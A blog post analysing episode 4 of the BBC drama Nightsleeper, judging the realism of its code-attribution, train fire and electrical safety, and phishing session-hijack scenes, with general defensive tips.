Analysing BBC's New TV Show - Nightsleeper - Episode 4

Here we go again! Hopefully have read the previous three assessments and you will know what I am trying to achieve with these breakdowns. But just in case you haven't, here is a little background.

The BBC has released a gripping new drama depicting a coordinated, national cyber attack against the UK rail network. Whilst there has clearly been some consulting done on this show (the buzzword bingo is never ending), the consulting has lacked in some key areas and this has led to the show using wild levels of creative license.

These analyses aim to break down key themes within the show, explain in a bit more detail which are real and which are not, why thats the case, and provide some actual context for how they may play out in the event of a real attack.

With that said, you can find links to the show and previous reviews at the end of this article.

Now, lets get into it. (it is a lot shorter this episode as there was less technical involvement):

Comparing Code Libraries

During the episode, we see the NCSC battling to try and trace the origins of the attack by comparing the code taken from the Single Board Computer (SBC) on Nightsleeper, with code samples held in their databases. Whilst to non-technical people this may seem like an unlikely scenario, this is actually a legitimate mechanism for tracing the origins of attacks.

Most capable hacking groups are made up of black/grey hat hackers that have executed multiple smaller attacks themselves before earning the right to be part of the team carrying out a bigger attack. This means the signature of the code they used, and the details of the person the authorities believe wrote the code, will be held on databases for the authorities use int he future. Almost like the fingerprints of someone who has been arrested before.

The other factor that makes this mechanism effective is that humans are creatures of habit. When a hacker writes code that works, they don’t want to keep reinventing the wheel. They will use sections of previous code time and time again, with minor tweaks, to achieve similar objectives in different attacks. This is because the effort required to create a different approach and code it out would make the mobilisation and testing time for an attack too long and increase their likelihood of being caught. They need to use code they know they can trust to work, get in and get out before systems detect them and shut them down.

What is an interesting turn, and will make tracing attacks harder, is the emergence of Artificial Intelligence and AI. This has enabled coders to automatically regenerate code, changing the language used, the syntax formats and the signature styles within the code in a fraction of the time it would take to manually code the same. This means that an attacker could use the same basic code, with every attack, but with bespoke execution code every time.

Fire & Electrical Damage

For you cyber guys, sorry this section is likely to be less interesting to you, for all you engineers, listen in!

The electrical systems that pass between carriages on trains can run on any number of different voltages and amperages from 12V to 750V, and 1-2 amps up to thousands of amps. For the shots fired at the train by police to damage the electrical systems in such a way it caused a fire, there is a high likelihood that this would have shorted at least some electrical systems out. 

On most modern trains, the electrical systems are protected by an earth leakage detection circuit breaker, and potentially Residual Current Devices (RCDs). Damage of the nature on Nightsleeper would result in at least one of those systems shorting to earth, especially when sprayed with a fire extinguisher that shorts a door switch out the way it did in the show. This short to earth would then result in the earth leakage circuit breaker tripping out, which then drops the feed to most control systems by cutting the feed to relays. This would have dropped the traction capability off and would have also dropped out multiple safety systems and brought in the emergency brakes.

Further to that, even if by some stretch the damage and subsequent fire did not short the electrics out, the activation of the fire alarm on most modern passenger units will cut traction, activate the emergency brakes and automatically discharge fire suppression systems where fitted. The driver would have the option to delay the discharge of suppression medium and restore subsystems for a limited time to ensure that the train can move to a more suitable location, but the initial response would be automatic.

Given there is no driver on board the train, and the button to holdoff the fire alarm is a manually activated electrical circuit, there is no way to remotely override this, so the fire would have brought the train to a stop.

Email Hacking Using Session Hijacking

At one point in the show, we see the NCSC technical director gain access to the email account of the director general by sending her a bespoke link in a phishing email.

Despite how it seems on the show, this is a realistic mechanism for gaining access to a secure account and before you think 'there is no way someone in the cyber sphere would fall foul of an obvious phishing attack', remember these people are human, in a high pressure environment, and this phishing attack was crafted by a cyber expert with targeted knowledge of the scenario they were working through.

Now, how would that work? How does sending a link to someone, get you access to their email accounts? Well, while the technical director was at the computer we see her selecting from lists of exploits, creating a local web server, and sending the link. The most likely scenario being used here is to send a link to a file containing an exploit. That exploit would do one of two things:

1. The first method is to create a reverse connection to the device that would allow the sender to explore data on the device, and the sender would need to go through the device to find what they’re looking for (unlikely in this scenario as the director general’s device would have detected a reverse connection)

2. The second, and in my opinion the most likely, method is a script is executed on the device that collects cookies, session keys and personal information for specific apps and sends this back to the senders’ web server. The session keys and data held within cookies can potentially then be used in replay attacks to trick a server into thinking the session is already authenticated and grant access.

 Don't worry, this type of attacks is not particularly easy to carry out, the script would often be detected by anti-malware software when downloaded, and to replay the data successfully takes skill. - Steps you can take to protect yourself include never clicking on links you were not expecting to receive, using two factor authentication to secure your accounts, and use a reputable service provider for your data to maximise the likelihood of their servers being hardened to a session being connected from multiple ip addresses at the same time.

If you found this content engaging, and would like to get in touch, please visit the website, or get in touch with me directly at [email protected].